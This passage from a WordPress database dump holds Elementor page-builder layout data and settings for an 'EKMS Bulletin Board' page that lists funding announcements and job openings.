Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9186e06\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a6cdbb6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8206b5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"260e34c\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(29101,4106,'_elementor_edit_mode','builder'),(29102,4106,'_elementor_template_type','wp-page'),(29103,4106,'_elementor_version','2.7.5'),(29104,4106,'_wp_page_template','default'),(29105,4106,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9186e06\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a6cdbb6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8206b5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"260e34c\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(29107,4107,'_elementor_edit_mode','builder'),(29108,4107,'_elementor_template_type','wp-page'),(29109,4107,'_elementor_version','2.7.5'),(29110,4107,'_wp_page_template','default'),(29111,4107,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(29114,72,'_elementor_pro_version','3.3.6'),(29116,4096,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29117,4108,'_elementor_edit_mode','builder'),(29118,4108,'_elementor_template_type','loop'),(29119,4108,'_elementor_version','3.4.0'),(29120,4108,'_elementor_pro_version','3.3.6'),(29121,4108,'_wp_page_template','default'),(29122,4108,'_elementor_data','[{\"id\":\"e4a1abb\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"15b418c\"}]},\"elements\":[{\"id\":\"0d08dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ee7a55e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"dcb65e7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6114d2a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05e59ec\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"0dd0942\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true},{\"id\":\"1bdd720\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"7beb698\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29124,4108,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29125,4109,'_elementor_edit_mode','builder'),(29126,4109,'_elementor_template_type','loop'),(29127,4109,'_elementor_version','3.4.0'),(29128,4109,'_elementor_pro_version','3.3.6'),(29129,4109,'_wp_page_template','default'),(29130,4109,'_elementor_data','[{\"id\":\"e4a1abb\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"15b418c\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"0d08dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ee7a55e\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"dcb65e7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6114d2a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":44.73400000000000176214598468504846096038818359375},\"elements\":[{\"id\":\"05e59ec\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"0dd0942\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true},{\"id\":\"1bdd720\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.538000000000000255795384873636066913604736328125},\"elements\":[{\"id\":\"7b6adbb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\"}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"7beb698\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9df80b7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"69112db\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%7D\\\"]\"}}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29132,4109,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29134,4110,'_elementor_edit_mode','builder'),(29135,4110,'_elementor_template_type','loop'),(29136,4110,'_elementor_version','3.4.0'),(29137,4110,'_elementor_pro_version','3.3.6'),(29138,4110,'_wp_page_template','default'),(29139,4110,'_elementor_data','[{\"id\":\"e4a1abb\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"15b418c\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"0d08dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ee7a55e\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"dcb65e7\"}],\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"6114d2a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":56.97699999999999675992512493394315242767333984375},\"elements\":[{\"id\":\"05e59ec\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"0dd0942\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true},{\"id\":\"1bdd720\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.629000000000001335820343228988349437713623046875,\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"7b6adbb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\"}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"7beb698\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.998000000000001108446667785756289958953857421875},\"elements\":[{\"id\":\"9df80b7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"69112db\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%7D\\\"]\"}}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38598,102,'_elementor_css','a:7:{s:4:\"time\";i:1770858126;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(29141,4110,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29143,4111,'_elementor_edit_mode','builder'),(29144,4111,'_elementor_template_type','wp-page'),(29145,4111,'_elementor_version','3.4.0'),(29146,4111,'_wp_page_template','default'),(29147,4111,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(29149,4111,'_elementor_pro_version','3.3.6'),(29150,4112,'_elementor_edit_mode','builder'),(29151,4112,'_elementor_template_type','wp-page'),(29152,4112,'_elementor_version','3.4.0'),(29153,4112,'_wp_page_template','default'),(29154,4112,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(29156,4112,'_elementor_pro_version','3.3.6'),(29157,4113,'_elementor_edit_mode','builder'),(29158,4113,'_elementor_template_type','wp-page'),(29159,4113,'_elementor_version','3.4.0'),(29160,4113,'_wp_page_template','default'),(29161,4113,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You 